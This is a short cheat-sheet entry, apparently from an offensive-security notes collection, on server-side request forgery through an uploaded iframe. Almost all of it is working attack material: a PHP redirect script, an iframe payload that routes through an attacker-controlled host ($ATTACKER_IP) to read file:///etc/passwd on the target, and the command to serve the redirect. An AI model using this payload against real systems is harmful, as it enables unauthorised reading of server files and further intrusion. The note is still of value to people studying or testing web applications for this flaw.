killchain-compendium/Exploits/Web/Iframe.md

SSRF through iframe

• taken from Jomar's Website
• Upload iframe with attacker server and php code ready to be executed. Redirect to a local file on the server

<?php
$loc = "http://127.0.0.1/";

if(isset($_GET['a'])){
    $loc = $_GET['a'];
}
header('Location: '.$loc);
?>

• Payload looks like this

<iframe src="http://$ATTACKER_IP:4711/ssrf.php?a=file:///etc/passwd"/>

• Start a php adhoc server and run it

php -S 0.0.0.0:4711